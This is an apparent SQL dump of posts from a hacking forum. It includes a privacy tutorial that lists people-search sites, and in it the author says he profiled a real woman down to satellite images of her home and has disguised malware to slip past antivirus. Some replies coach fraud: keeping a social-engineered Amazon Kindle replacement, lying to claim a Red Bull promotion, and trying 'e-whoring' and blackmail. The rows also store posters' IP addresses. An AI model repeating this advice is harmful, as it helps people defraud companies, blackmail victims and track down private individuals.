Hackers - These are the most infamous hackers there are. These are the guys you hear about it on the news due to committing crimes. These people are whose purpose is to gain information and use for their own need. They could be anyone. \r\n\r\n-Black Hats tend to be professionals at what they do and are extremely well informed on everything related with the cyber world and crimes. \r\n-Black Hats tend to be educated people who have worked many years to accumulate all the knowledge they hold. They are not your kid who uses \"hacking tools\" to scare their gaming buddies online. \r\n-Black Hats is the image typically portrayed on movies.\r\n\r\n2) White Hat Hackers - These are the lesser known hackers simply because they do the clean up work that goes behind the scenes cleaning up the messes from Black Hat Hackers. \r\n\r\n-White Hats are the heroes of the cyber world. They fight crime using their hacking knowledge to patch exploits on system and assure that your information does not gets leaked out or easily acquired by any Black Hats.\r\n-White Hats are professionals at what they do. They have as much knowledge as Black Hats, but use their skills to fight crime rather than aid it.\r\n\r\n3) Gray Hat Hackers - These are the somewhat known hackers simply because they are unpredictable on what their actions might turn into. They are known as \"Gray Hats\" because it\'s a mixture between the color White + Black = Creating: Gray\r\n\r\n-Gray Hats are essentially neutrals on what they do. They might decide to do what\'s right even if there\'s some other entity telling them that it\'s wrong or could be vice versa. \r\n\r\nFor example, Black Hat steals bank information and leaks out on the internet. Gray Hat could either decide to either use the information OR let the owners, authorities, or the companies know of the exposure. \r\n\r\n[/b][/color]\r\n\r\n[color=#00BFFF][size=x-large]2) Website owners[/size][/color]\r\n\r\n[color=#FFD700][b]Websites, there are millions of them around the world in all languages. You can keep yourself entertained on them or you can become smarter reading potential useful information as you are reading now. :thumbsup:\r\n\r\nDo you ever wonder \"Who owns this website?\" or \"How can I find out who owns it?\"\r\n\r\nI decided to include this topic on here since more and more people decide to pay for hosting services to have their very own website for either personal usage or some sort of business. \r\n\r\nWell, unlike in the real world where you fill out papers and they get stacked or hidden in some compartment where not a random person could have access. Websites expose your information unknowingly. Maybe not the websites themselves, but the companies that provide hosting services. \r\n\r\nI will use this website \"HackForums.net\" as an example to teach what I\'m talking about.\r\n\r\nThere is something known as a \"whois\" that essentially tells you who registered the domain name.\r\n\r\nYou can easily Google \"whois domain\" and a huge list of websites that allow you to whois either a location or a domain to find its location.\r\n\r\nMy favorite website to do whois is: \r\n\r\nhttp://whois.domaintools.com/\r\n\r\nNow, if we do a whois on HackForums.net, here\'s what we get.\r\n[/b][/color]\r\n\r\n[color=#FFD700][b]As you can see it exposes a lot of information that you wouldn\'t want strangers to get a hold of you and then use to sell for their own good. \r\n\r\nHackForums.net is registered as a \"Private\" domain, so no real information is shown of the real owner. Instead, it displays the information of the company providing the service for the domain or hosting. \r\n\r\nThis is also how you can contact a company if you want to report a website with disgusting content such as child pornography. \r\n\r\nI\'m not going to whois a person\'s website since it would be against the rules to expose personal information about anyone, but I believe that you get the idea of what can be done to discover information such as address, name, phone number, fax number, and more using nothing but a website name.\r\n\r\nExperienced website administrators always should use Private domains to avoid exposing information to the public as much as possible.\r\n\r\nIf you have a website, whois it yourself and find out whether if you are exposed or not. If you are, call the company you registered your domain and request your domain to be put as private. They might require a fee of around $7 extra a year, but it\'s worth it knowing that you\'re not exposed. \r\n\r\nYou could also find out the ISP or company by doing a ping on an IP.\r\n\r\nExample,\r\n\r\nOpen Command Prompt and type \"ping Hackforums.net\" the response will be an IP. Once you have that IP, you can use:\r\n\r\nhttp://iplocation.net/\r\n\r\nTo tell you where the servers are located and giving you a definite location for the company\'s machines. \r\n\r\nhttp://iplocation.net/ Can also be used to find the location of a person\'s location with their IP.\r\n[/b][/color]\r\n\r\n[color=#00BFFF][size=large]3) Your name[/size][/color]\r\n\r\n[color=#FFA500][b]Your name is as unique as you can be. Your parents/guardians named you and that\'s what makes you, you. \r\n\r\nYour name can be your worst enemy when you are online as it can be used to expose so much information about you to the point of where you could be blackmailed. \r\n\r\nWhere should you ever use your real name online? NEVER. Why? Because, using your name alone anyone can find out where you live within a matter of 5 seconds. \r\n\r\nWebsites such as:\r\n\r\nhttp://com.lullar.com/\r\n\r\nhttp://www.pipl.com/email/\r\n\r\nhttp://www.spokeo.com\r\n\r\nhttp://www.emailfinder.com\r\n\r\nhttp://extremetracking.com/\r\n\r\nhttp://www.411.com/\r\nhttp://www.ask.com/\r\nhttp://www.bebo.com/\r\nhttp://www.facebook.com/\r\nhttp://www.flickr.com/\r\nhttp://www.ip-adress.com/ipaddresstolocation/\r\nhttp://www.myspace.com/\r\nhttp://www.myyearbook.com/\r\nhttp://www.searchenginez.com/findpeople.html\r\nhttp://www.skipease.com/\r\nhttp://www.sonico.com/\r\nhttp://www.spock.com/\r\nhttp://www.twitter.com/\r\nhttp://www.usatrace.com/\r\nhttp://www.whitepages.com\r\nhttp://www.whois.com/\r\nhttp://www.whois.net/\r\nhttp://www.wink.com/\r\nhttp://www.youtube.com\r\nhttp://www.zabasearch.com/\r\nhttp://www.zoominfo.com\r\n\r\nMake it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers. [/b][/color]:blackhat:\r\n\r\nHere\'s an example of a person I searched for the sake of showing.\r\n[img]http://img130.imageshack.us/img130/332/identity.png[/img]\r\n\r\n[b][color=#FFA500]I have satellite pictures using Google Earth to pinpoint exactly where she lives and what her house looks like, but I will not expose that.\r\n\r\nWhere is this information normally exposed? Hmm...I\'ll let you guess. Or maybe not...The answer is Social Networks. Ah, Facebook, Myspace, Orkut, and so many others...The list goes on and on.\r\n\r\nI highly recommend that you NEVER use your real name, instead use an edited name or initials instead rather than exposing your real name to the real world. If your friends on social networks already know you, they should not need to see your complete name as they will already know you. \r\n\r\nFor example,\r\n\r\nBill Gates\r\n\r\nMy recommendation would be to use \"Billy Gates\" simply because a letter being off makes it so incredibly difficult to pinpoint someone. \r\n\r\nYou can use your imagination for what you should replace your name instead of your real name. That is, if you want to avoid being looked up.\r\n\r\nSomething I have found based on experience is that it\'s much more difficult pinpointing teenagers on the internet since they are not normally registered with government database that eases finding them.\r\n\r\nIf you are a teenager, do not have your parents names exposed as the name of your parents can be used to pinpoint you or vice versa, if you are a parent. Ironically, it\'s the teenagers that expose more information than adults and yet, they are the ones harder to pinpoint.[/color][/b]\r\n\r\n[color=#00BFFF][size=large]4) Your e-mail[/size][/color]\r\n\r\n[color=#FFD700][b]Your e-mail, the one you use to check on your everyday business or activities online. The one you rely to deliver things to you safely. \r\n\r\nQuestion is, are you delivering to it safely? Probably not, or at least I hope you are.\r\n\r\nThe e-mail problem is an easy fix since all it takes is common sense. \r\n\r\nIf you have various accounts such as Social networks, have an e-mail specifically for messing around. If you have accounts for serious business such as your Paypal, Bank, etc...\r\n\r\nHave an e-mail that only you have access to and is different from your regular \"messing around\" e-mail.\r\n\r\nIf you work for any companies or have services with an ISP, avoid using their e-mail services to register on important websites where your money is dealt with such as Paypal, AlertMoney, banks, etc...\r\n\r\nWhy? Because they have been known to get hacked leaving all your information exposed for hackers to gorge in. Instead, I would recommend focusing on big companies such as Yahoo, Hotmail, or Gmail since these are much more secured companies and will always be up 24/7 any time of the year. \r\n\r\nNot much to say on that, just have different e-mails for different activities for security measures. Not only that, but also have different passwords that require extensive typing with various complicating symbols such as:\r\n\r\nyou%(3cool\r\n\r\nThat above is a ridiculous example, but I believe you get the idea.\r\n\r\nYou know what hackers love the most? Not having to do much work and having everything set for them easily for the taking. For example, if you are infected with a keylogger, a hacker would love to have 1 e-mail to have access to everything. So, this gives you an idea why you should have a variety at all times with up-to-date information to assure that you could retrieve it, in case if it were to get stolen. \r\n[/b][/color]\r\n\r\n[color=#00BFFF][size=large]5) What you sign up to[/size][/color]\r\n\r\n[color=#FFD700][b]Ever wondered why you get so much spam e-mails? Well, it\'s simple. It\'s because e-mail collectors acquire a list of e-mails in which they can mass e-mail to send spam. \r\n\r\nJust as I mentioned earlier, have an e-mail for messing around and e-mails for serious business. Avoid using an e-mail for all activities as this will only clog your inbox with useless e-mails that will steal your valuable time. \r\n\r\nThere are many websites which sell their database of e-mails to E-mail spammers for a certain amount of money behind the scenes or the collectors themselves have set traps through the internet such as Phishing to acquire a list of e-mails to spam.\r\n\r\nAvoid registering to websites such as products and random useless subjects that promise to pay you money for signing up or trying their products. \r\n\r\nSeems to me like it\'s common sense, but it\'s good to know.\r\n\r\n[/b][/color]\r\n\r\n[color=#00BFFF][size=large]6) Information you expose unknowingly [/size][/color]\r\n\r\n[color=#FFD700][b]Well, I hope that I have given you a good idea of easily information can be acquired using the internet. \r\n\r\nPrivacy does not exists anymore on the internet. \r\n\r\nIf you use Social Networks, try to have your information concealed as much as possible from the public and do not expose valuable information such as Birthday, location, or name to keep yourself as underground as possible. \r\n\r\nYou have to consider that information could be leaked physically or electronically as well. \r\n\r\nKeep yourself up-to-date and informed to know if a company you might use has been breached or not.\r\n\r\nhttp://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history\r\n\r\nAs they say, Google is your friend. Use it when you need it.[/b][/color]\r\n\r\n[color=#00BFFF][size=large]7) Keeping you safe[/size][/color]\r\n[color=#FFD700][b]\r\nThis is probably the most important part of the tutorial as this is where the most incidents occur due to infections or traps.\r\n\r\nInfections or traps can range from:\r\n\r\n-RATs (Remote Access Tool) which essentially give completely control of your computer. \r\n\r\n-Keylogging which retains a log of all the keys you ever press on your keyboard.\r\n\r\n-Phishing which retains a log when you manually input your information on a fake website emulating an original website.\r\n\r\n-And more, but those above are the most common.\r\n\r\nHow can you protect yourself? \r\n\r\nAround 90% of malware on the internet was coded to infect Windows Operating systems. I got that number from PC World about a year ago, forgive me if it\'s incorrect now. \r\n\r\nAnyway, assuming that you run on Windows you are the ones are the highest risk of getting targeted or infected. \r\n\r\nYou will want to always have your computer clean and secured having the proper tools. All these tools are the best of the best and are all free. They are probably better than paid security software.\r\n\r\nHow do I know this? Well, there are websites where you can scan malware after you crypt them (making them undetectable) to ensure that they are not detected by Anti-virus of any kind. Avira is the one that people always have a hard time bypassing, so I can safely say that it\'s the best from my personal experience of crypting and scanning.\r\n\r\nDownload and install all these tools below and I can assure you that your computer will be protected 1000% better than what it might be as of now. Get the free versions. \r\n\r\nhttp://www.malwarebytes.org/\r\n\r\nhttp://personalfirewall.comodo.com/\r\n\r\n[url=http://www.hackforums.net/showthread.php?tid=1176530]Avira Anti-Virus[/url] - Follow the instructions on that link on how to get it free.\r\n\r\n[url=http://www.hackforums.net/showthread.php?tid=881241&highlight=keyscrambler]KeyScrambler Pro 2.7[/url] - Follow the instructions on that link on how to get it for free. This software helps to encrypt everything you type on the internet. \r\n\r\nIf you use Google Chrome, get this:\r\n\r\nhttps://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof?hl=en\r\n\r\nIt encrypts all your website visits as https:// rather than http:// which makes you more secured.\r\n\r\nIf you use Firefox, get this:\r\n\r\nhttp://www.eff.org/https-everywhere\r\n\r\nIt encrypts all your website visits as https:// rather than http:// which makes you more secured as well.\r\n\r\nhttp://notendur.hi.is/~gas15/FireShepherd/\r\n\r\nFireShepherd, a small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep. \r\nThe program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone. \r\n-Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed. \r\n\r\nThe other option is using a different operating system which has a lower percentage of being targeted. \r\n\r\nYou don\'t have to spend tons of money on Apple computers, instead you can get a free operating system from the Linux distributions. \r\n\r\nThe easiest to use and most similar to Windows looks is Ubuntu. You can install Ubuntu as a normal program on Windows and once it restarts, it shows you the option to choose Ubuntu over Windows. \r\n\r\nYou can watch this video:\r\n\r\nhttp://www.youtube.com/watch?v=UdI8_92QTkQ\r\n\r\nTo learn more in dept. It\'s very simple, so don\'t be afraid to try. \r\n\r\nThe video focuses on completely replacing your current operating system Windows and replacing it or dual booting with Linux Ubuntu.\r\n\r\nIf you are a noobie, I would recommend you stop at the part where he goes to:\r\n\r\n[url=http://www.wubi-installer.org]Wubi Installer - Ubuntu[/url]\r\n\r\nIt\'s as simple as going Next, next, next on any normal installation and whenever you restart your computer, it will ask you to choose either Ubuntu or Windows.\r\n\r\nRunning under a Linux distribution will put you at around a 2-5% of getting infected with anything. Not only is Linux good, but you don\'t have to worry much about installing anti-virus or anti-malware software to keep your computer clean and running.\r\n\r\nI have been running on Backtrack 4 R2, a Linux Distribution and I can tell you that I have NEVER been infected. [/b][/color]\r\n\r\n[size=small]Credits: Developer[/size]', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '12f519ad17216642d66463093c5fe8a9', '0', '0'); INSERT INTO mybb_posts VALUES('715', '151', '399', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '1', 't3h jok3r', '1345770943', 'Now you are being clear [b]RACIST[/b] to windows 7, because there are no urls for windows 7.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '8a8aa0670a65a6799262621a2edeb63d', '0', '0'); INSERT INTO mybb_posts VALUES('716', '32', '645', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '10', 'swa4567', '1345771883', '[quote=\'GRONgamer61\' pid=\'645\' dateline=\'1345684691\']\r\nalrighty I\'m kinda scared. I just did this, they are sending a replacement but they have told me that I have to send broken one back, which I obviously cant do. What do I do????\r\n[hr]\r\nIf I don\'t in thirty days they will charge the credit care(VCC), I could care less about that, but they have my address?\r\n[/quote]\r\n\r\nDon\'t worry, they won\'t do anything with your address. Most likely charge your VCC.\r\n\r\nDon\'t worry about sending the broken one in.', '41.151.193.77', '697811277', '0', '0', '0', '0', '1', 'c1561fb379fdff2c3bea2c0692b32f10', '0', '0'); INSERT INTO mybb_posts VALUES('717', '194', '681', '16', 'RE: So i got this from redbull.', '0', '10', 'swa4567', '1345771987', 'As far as I know, Redbull is a drink. So you can say, you threw the receipt away. Take any popular stores name (EX: walmart, walgreen). Say what day you bought it on, but do not give them the time. You can either say you threw the can away or you can go to your nearest store and get the code.', '41.151.193.77', '697811277', '0', '0', '0', '0', '1', 'f6274d78a39bf28ac2f955f9fcaffa97', '0', '0'); INSERT INTO mybb_posts VALUES('718', '26', '676', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1345772070', '[quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\']\r\nI never tried E-Whoring before. :/ I want to try it!\r\n[/quote]\r\n\r\nGive it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s)', '41.151.193.77', '697811277', '1', '0', '0', '0', '1', 'ca7630989d030519c68c42b00814fb3e', '0', '0'); INSERT INTO mybb_posts VALUES('719', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '100', '??zg???g????61', '1345772262', 'Oh cool thanks, I think I just relaxed a whole lot more.', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', 'ec73efe4d965ebc97c76b13bcebf18a4', '0', '0'); INSERT INTO mybb_posts VALUES('720', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '100', '??zg???g????61', '1345774110', 'the Network Security download is locked with a password... --...--', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', '20d1493c564931207354bc8feb684b68', '0', '0'); INSERT INTO mybb_posts VALUES('721', '197', '696', '56', 'RE: /me Thread', '0', '100', '??zg???g????61', '1345774401', '/me Hello(; -=-=-=-=-=-=-=-=-=-=-=-', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', 'c38ff1f123a1860de4524f482417a209', '0', '0'); INSERT INTO mybb_posts VALUES('722', '197', '696', '56', 'RE: /me Thread', '0', '20', 'JakeUS', '1345775015', '/me JakeUS is a Staff member?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'cc2095d91cddf1862cdf1fbabe849f53', '0', '0'); INSERT INTO mybb_posts VALUES('723', '200', '0', '55', '[Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345776608', 'Hey LH,\r\nI would like a request of Adobe Photoshop CS6 Portable please. =] I am currently using Adobe Photoshop CS4 but I need the latest version. Thanks in advance.\r\n\r\n\r\n\r\nNOTE:\r\n- Add a virus scan please.\r\n- Please test the file first before giving me the download link.I don\'t want a virus on my computer.\r\n- Don\'t give survey links.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ac6d85c7ae0ae491ffdb8f2fbbc15a', '0', '0'); INSERT INTO mybb_posts VALUES('724', '189', '652', '49', 'RE: Webmaster Section', '0', '54', 'Sin Cara', '1345781976', 'Ok i understand what you want to say. ;)', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', 'aad85ae5e382cd9d639f801e1db2de5f', '0', '0'); INSERT INTO mybb_posts VALUES('725', '139', '669', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345782029', '[quote=\'iTzIpod\' pid=\'669\' dateline=\'1345749545\']\r\nStill temporarily unavailable! :/ Been 2 days.\r\n[/quote]\r\n\r\nJust wait otherwise i will close thread.', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', '87909b8dcb0460085f72bc65cf235703', '0', '0'); INSERT INTO mybb_posts VALUES('726', '151', '715', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '54', 'Sin Cara', '1345782459', '[quote=\'t3h jok3r\' pid=\'715\' dateline=\'1345770943\']\r\nNow you are being clear [b]RACIST[/b] to windows 7, because there are no urls for windows 7.\r\n[/quote]\r\n\r\nBut it worked fine for me ;)', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', 'b6363571ab90ae34ac1ebc4d788608eb', '0', '0'); INSERT INTO mybb_posts VALUES('727', '201', '0', '42', 'Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345783095', 'USTIN, Texas (AP) -- With stunning swiftness, the U.S. Anti-Doping Agency said Thursday night it will strip Lance Armstrong of his unprecedented seven Tour de France titles after he dropped his fight against drug charges that threatened his legacy as one of the greatest cyclists of all time.\r\nTravis Tygart, USADA\'s chief executive, said Armstrong would also be hit with a lifetime ban on Friday. And under the World Anti-Doping Code, he would lose the bronze medal from the 2000 Olympics as well as any awards, event titles and cash earnings.\r\nArmstrong, who retired last year, effectively dropped his fight by declining to enter USADA\'s arbitration process - his last option - because he said he was weary of fighting accusations that have dogged him for years. He has consistently pointed to the hundreds of drug tests he passed as proof of his innocence while piling up Tour titles from 1999 to 2005.\r\n\'\'There comes a point in every man\'s life when he has to say, \'Enough is enough.\' For me, that time is now,\'\' Armstrong said. He called the USADA investigation an \'\'unconstitutional witch hunt.\'\'\r\n\'\'I have been dealing with claims that I cheated and had an unfair advantage in winning my seven Tours since 1999,\'\' he said. \'\'The toll this has taken on my family and my work for our foundation and on me leads me to where I am today - finished with this nonsense.\'\'\r\nUSADA reacted quickly and treated Armstrong\'s decision as an admission of guilt, hanging the label of drug cheat on an athlete who was a hero to thousands for overcoming life-threatening testicular cancer and for his foundation\'s support for cancer research.\r\n\'\'It is a sad day for all of us who love sport and athletes,\'\' Tygart said. \'\'It\'s a heartbreaking example of win at all costs overtaking the fair and safe option. There\'s no success in cheating to win.\'\'\r\nTygart said the agency had the power to strip the Tour titles, though Armstrong disputed that.\r\n\'\'USADA cannot assert control of a professional international sport and attempt to strip my seven Tour de France titles,\'\' he said. \'\'I know who won those seven Tours, my teammates know who won those seven Tours, and everyone I competed against knows who won those seven Tours.\'\'\r\nStill to be heard from was the sport\'s governing body, the International Cycling Union, which had backed Armstrong\'s legal challenge to USADA\'s authority and in theory could take the case before the international Court of Arbitration for Sport.\r\nTygart said UCI was \'\'bound to recognize our decision and impose it\'\' as a signer of the World Anti-Doping Code.\r\n\'\'They have no choice but to strip the titles under the code,\'\' he said.\r\nUSADA maintains that Armstrong has used banned substances as far back as 1996, including the blood-booster EPO and steroids as well as blood transfusions - all to boost his performance.\r\nThe 40-year-old Armstrong walked away from the sport in 2011 without being charged following a two-year federal criminal investigation into many of the same accusations he faces from USADA.\r\nThe federal probe was closed in February, but USADA announced in June it had evidence Armstrong used banned substances and methods - and encouraged their use by teammates. The agency also said it had blood tests from 2009 and 2010 that were \'\'fully consistent\'\' with blood doping.\r\nIncluded in USADA\'s evidence were emails written by Armstrong\'s former U.S. Postal Service teammate Floyd Landis, who was stripped of his 2006 Tour de France title after a positive drug test. Landis\' emails to a USA Cycling official detailed allegations of a complex doping program on the team.\r\nUSADA also said it had 10 former Armstrong teammates ready to testify against him. Other than suggesting they include Landis and Tyler Hamilton, both of whom have admitted to doping offenses, the agency has refused to say who they are or specifically what they would say.\r\n\'\'There is zero physical evidence to support (the) outlandish and heinous claims,\'\' Armstrong said. \'\'The only physical evidence here is the hundreds of (doping) controls I have passed with flying colors.\'\'\r\nArmstrong sued USADA in Austin, where he lives, in an attempt to block the case and was supported by the UCI. A judge threw out the case on Monday, siding with USADA despite questioning the agency\'s pursuit of Armstrong in his retirement.\r\n\'\'USADA\'s conduct raises serious questions about whether its real interest in charging Armstrong is to combat doping, or if it is acting according to less noble motives,\'\' such as politics or publicity, U.S. District Judge Sam Sparks wrote.\r\nEven if UCI and USADA differ on the Tour titles, the ultra-competitive Armstrong has still done something virtually unthinkable for him: He quit before a fight is over.\r\nIt was a stunning move for an athlete who built his reputation on not only beating cancer, but forcing himself through grueling offseason workouts no one else could match, then crushing his rivals in the Alps and the Pyrenees.\r\n\'\'Today I turn the page. I will no longer address this issue, regardless of the circumstances,\'\' he said. \'\'I will commit myself to the work I began before ever winning a single Tour de France title: serving people and families affected by cancer, especially those in underserved communities.\'\'\r\nArmstrong could have pressed his innocence in USADA\'s arbitration process, which would have included a hearing during which evidence against him would have been presented. But the cyclist has said he believes most people have already made up their minds about whether he\'s a fraud or a persecuted hero.\r\nAlthough he had already been crowned a world champion and won individual stages at the Tour de France, Armstrong was still relatively unknown in the U.S. until he won the epic race for the first time in 1999. It was the ultimate comeback tale: When diagnosed with cancer, doctors had given him less than a 50 percent chance of survival before surgery and brutal cycles of chemotherapy saved his life.\r\nArmstrong\'s riveting victories, his work for cancer awareness and his gossip-page romances with rocker Sheryl Crow, fashion designer Tory Burch and actress Kate Hudson made him a figure who transcended sports.\r\nHis dominance of the Tour de France elevated the sport\'s popularity in America to unprecedented levels. His story and success helped sell millions of the \'\'Livestrong\'\' plastic yellow wrist bracelets, and enabled him to enlist lawmakers and global policymakers to promote cancer awareness and research. His Lance Armstrong Foundation has raised nearly $500 million since its founding in 1997.\r\nJeffery C. Gervey, chairman of the foundation, issued a statement of support saying:\r\n\'\'Faced with a biased process whose outcome seems predetermined, Lance chose to put his family and his foundation first,\'\' Gervey said. \'\'The leadership of the Lance Armstrong Foundation remain incredibly proud of our founder\'s achievements, both on and off the bike.\'\'\r\nCreated in 2000, USADA is recognized by Congress as the official anti-doping agency for Olympic sports in the United States. Its investigators joined U.S. agents during the federal investigation of Armstrong. Tygart dismissed Armstrong\'s lawsuit as an attempt at \'\'concealing the truth,\'\' saying the agency is motivated by one goal - exposing cheaters.\r\nArmstrong had tense public disputes with USADA, the World Anti-Doping Agency, some former teammates and assistants and even Greg LeMond, the first American to win the Tour de France.\r\nOthers close to him were caught up in the investigations, too: Johan Bruyneel, the coach of Armstrong\'s teams, and three members of the medical staff and a consultant were also charged. Bruyneel is taking his case to arbitration, while two medical team staffers and consulting doctor Michele Ferrari didn\'t formally contest the charges and were issued lifetime ban by USADA. Ferrari later said he was innocent.\r\nQuestions surfaced even as Armstrong was on his way to his first Tour victory. He was leading the 1999 race when a trace amount of a banned anti-inflammatory corticosteroid was found in his urine; cycling officials said he was authorized to use a small amount of a cream to treat saddle sores.\r\nAfter Armstrong\'s second victory in 2000, French judicial officials investigated his Postal Service team for drug use. That investigation ended with no charges, but the allegations kept coming.\r\nArmstrong was criticized for his relationship with Ferrari, who was banned by Italian authorities over doping charges in 2002. Former personal and team assistants accused Armstrong of having steroids in an apartment in Spain and disposing of syringes that were used for injections.\r\nIn 2004, a Dallas-based promotions company initially refused to pay him a $5 million bonus for winning his sixth Tour de France because it wanted to investigate allegations raised by media in Europe. Testimony in that case included former teammate Frankie Andreu and his wife, Betsy, saying Armstrong told doctors during his 1996 cancer treatments that he had taken a cornucopia of steroids and performance-enhancing drugs.\r\nTwo books published in Europe, \'\'L.A. Confidential\'\' and \'\'L.A. Official,\'\' also raised doping allegations and, in 2005, French magazine L\'Equipe reported that retested urine samples from the 1999 Tour showed EPO use.\r\nArmstrong fought every accusation with denials and, in some cases, lawsuits against media outlets that reported them.\r\nHe retired in 2005 and almost immediately considered a comeback before deciding to stay on the sidelines - in part because he didn\'t want to keep answering doping questions.\r\n\'\'I\'m sick of this,\'\' Armstrong said in 2005. \'\'Sitting here today, dealing with all this stuff again, knowing if I were to go back, there\'s no way I could get a fair shake - on the roadside, in doping control, or the labs.\'\'\r\nThree years later, Armstrong was 36 and itching to ride again. He came back to finish third in the 2009 Tour de France.\r\nArmstrong raced again in 2010 under the cloud of the federal investigation. Early last year, he quit the sport for good, making a brief return as a triathlete until the USADA investigation shut him down.\r\nDuring his sworn testimony in the dispute over the $5 million bonus, Armstrong said he wouldn\'t take drugs because he had too much to lose.\r\n\'\'(The) faith of all the cancer survivors around the world. Everything I do off the bike would go away, too,\'\' Armstrong said then. \'\'And don\'t think for a second I don\'t understand that. It\'s not about money for me. Everything. It\'s also about the faith that people have put in me over the years. So all of that would be erased.\'\'\r\n\r\nsource\r\nhttp://sports.yahoo.com/news/lance-armstrong-faces-big-decision-165515351--spt.html', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '5f35c25da6e50d780dd64ed9c2622e4f', '0', '0'); INSERT INTO mybb_posts VALUES('728', '202', '0', '25', 'Virus Removal Guide! Pictures and step by step you can\'t fail!', '0', '54', 'Sin Cara', '1345783924', 'credits :- [size=large][color=#FF4500]SuaveSalmon[/color] [/size]\r\n\r\nHere is a simple Virus Removal guide. Think you have a virus? Computer slow, popups, random ads, or just want to check? Well in this case you have come to the right thread. Here I will show you how to take all that off with simple programs. All links will be provided straight to the download link. So lets get started.\r\nAll the adf.ly money will go to hackforums and member giveaways! All links are from the authorized sites\r\n\r\nFirst: Install Mozilla firefox (I recommend it because it has a virus detection built in, it will scan all files before download them, it takes around 3 seconds for them to scan it) at\r\nhttp://adf.ly/65Nbi\r\n\r\nSecond: open it up. You can transfer all your passwords from Internet Explorer (or what you are using) to Firefox if you would like. I wouldn\'t suggest it but you can if you want.\r\n\r\nThird: Once you have Firefox installed go to this link\r\nhttp://adf.ly/65Ne5\r\nand save the the file.\r\nIt is eset online scanner. When you save it a little box will appear double and download the file. Click esetsmartinstaller.exe and click run. Accept the terms of use. Let it do its three steps. It may open and close a few times but just wait.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/eset.png[/img]\r\nYou should be brought to this box. Check off clean archives and once you have done that look under the scan archives options. You should see an icon that say advanced options. Click on that and check the options I have checked. Once you have done so click start. It will download its virus database so let it do so.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/Untitled.png[/img]\r\nOnce this is done it should start a scan automatically. Let this run and go watch a YouTube episode (http://adf.ly/65NTY YouTube link. Just trying to scrape up some cash). It may make your computer lag (depending on your specs) a little bit but not to bad.\r\n\r\nOnce the scan is done click the remove the programs button or next. When it is done click next or the other option it gives you. It will tell you to download and their program and explain it so when you have completed and removed all harmful programs you can close it. I would suggest eset it is paid but it is a very effective antivirus. http://adf.ly/65OZT there is the link to their homepage if you want the amazing program!You even get a free 30 day trial!\r\n\r\nStep four: You are going to need to reopen Firefox and download malwerbytes. Here is the main website\r\nhttp://adf.ly/65Nhk\r\nbut it may be down and if so download from cnet\r\nhttp://adf.ly/65NmA\r\nOnce you have downloaded it will bring up the download box. Once done downloading double click it and run the mbam.exe file.\r\nClick English (or the language you would prefer) and follow through the setup. Once at the end of the setup click install. It will say launch and update malwerbytes so just click finish and it will do so. It will connect to their server and download the virus detection database. Just let it download and click ok.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/mbam.png[/img]\r\n\r\nGo to the “Settings” tab and make sure you have everything I have checked (don\'t forget the boxes below the check marks). Once you have these settings checked go back to the “Scanner” tab and click perform full scan. It may take a while so go watch another YouTube video ( http://adf.ly/65NTY ). Once it is done click show results in the bottom corner if you have any results make sure there is a check next to all of them and then click remove all. It will ask you to restart so do so!\r\n\r\nStep 5: Download ccleaner\r\n\r\nhttp://adf.ly/65No1\r\nrun the .exe in the pop up box.\r\nOne you have done that follow through with the steps. One you get to the recycle bin menu check off what you feel you should. Then click finish and it will open. Check off all the options I have checked off in the picture below.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/cc.png[/img]\r\n\r\nCheck off network passwords too. One you have done that go to the applications tab, right next to the cleaner/windows button. Make sure every single application has a check next to it. ALL OF THEM! Then click run cleaner. Do not analyze just click the “Run Cleaner” button. It may take a while depending on how much junk you may have. Then go to the registry tab and click scan for issues. You may see a bunch of problems so click fix. Then click fix all selected issues. It will ask you to save a copy of the registry so click yes and let it save.\r\n\r\nStep 6: Download spybot search and destroy\r\nhttp://adf.ly/65Npr\r\nclick save file. Double click the spybot.exe in the pop up once it is done downloading. Now you have spybot open click, English (or the language you prefer)and accept the terms of use. Now check of these options.\r\n[img]http://i1168.photobucket.com/albums/r493/SuaveSalmon/spybot.png[/img]\r\nClick next then next again and next. You may want to install teatimer. I would not prefer it. You can use it as a free antivirus but it may make your computer lag (depending on your specs). I would suggest it if you click on a lot of random links. It blocks some malicious/virus filled links. But if you do not have a great computer than just leave it off. Also go ahead and check off the internet explorer tool. Click next and install. It will give you two bars downloading the program. Then it will extract. You will get a box with three options checked. That is good leave that and click 